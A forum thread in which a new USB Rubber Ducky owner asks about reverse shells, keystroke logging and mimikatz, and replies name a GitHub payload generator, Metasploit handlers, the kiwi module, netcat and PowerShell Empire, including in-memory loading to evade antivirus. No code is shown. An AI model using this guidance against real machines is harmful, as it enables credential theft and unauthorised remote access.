Jump to content

Recommended Posts

Just got my first rubberducky and it quacks like a keyboard

looking forward in some serious pen testing.

im interested in the reverse shell methods

From my understanding it connects to another computers ip and port , and then opens up somekind of shell.

From the other computer it should be possible to run remote commands ,,, am I getting this correct ?

Questions :

1. Is it possible to listen on keystrokes with reverse shell ?

- If not , what other methods would work for the keystrokes, preferrably on win10 ?

2. what programs should be setup on the other end and how should they be setup ?

3. is it possible to run mimikatz trough reverse shell ?

looking forward in creating some cool payloads

Link to post
Share on other sites
  • 2 weeks later...

I have done a reverse shell with meterpreter with a duck (All on my own machines I can assure you :wink: ). The only real requirement is knowing how to use metasploit's multi handler module. You can find many guides to setting up one. But by far the easiest way to setup a reverse shell with duck is with this

https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky

As long as you have ruby on your system (Which you should have anyways if you have metasploit installed) the program should run. All it needs is the ip that metasploit is on and what port to look for and turns it into a text file that you can turn into an inject.bin file for your duck.

Unfortunately the program only opens a standard cmd window (Though can be fixed by editing the code afterwards) and the inject.bin file this program makes is 15.8KB, So if you run twin duck on your rubber duck your out of luck somewhat (A work around could be hosting the raw data for the base64 code on the duck sd card in a txt and using notepad to copy and paste it into powershell after.).

And as for mimikatz, meterpreter has a post module built in called kiwi. it runs the appropriate mimikatz version on the metasploit session.

Anyways have fun, and I'm not responsible for whatever your going to use this knowledge for. I'm posting this for educational purposes only.

Link to post
Share on other sites
  • 3 weeks later...

Just got my first rubberducky and it quacks like a keyboard

looking forward in some serious pen testing.

im interested in the reverse shell methods

From my understanding it connects to another computers ip and port , and then opens up somekind of shell.

From the other computer it should be possible to run remote commands ,,, am I getting this correct ?

Questions :

1. Is it possible to listen on keystrokes with reverse shell ?

- If not , what other methods would work for the keystrokes, preferrably on win10 ?

2. what programs should be setup on the other end and how should they be setup ?

3. is it possible to run mimikatz trough reverse shell ?

looking forward in creating some cool payloads

1. Yes

2. Depends on what method you use to spawn the reverse shell, you have many options. You may use a simply netcat listener, a meterpreter payload handler, PowerShell empire payload handler, etc.

3. In the post-exploitation phase you could upload mimikatz, or, if you are using something like Powershell Empire to spawn the reverse shell then that functionality is built right in, and can be loaded right into memory without ever touching the disk (AV bypass).

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...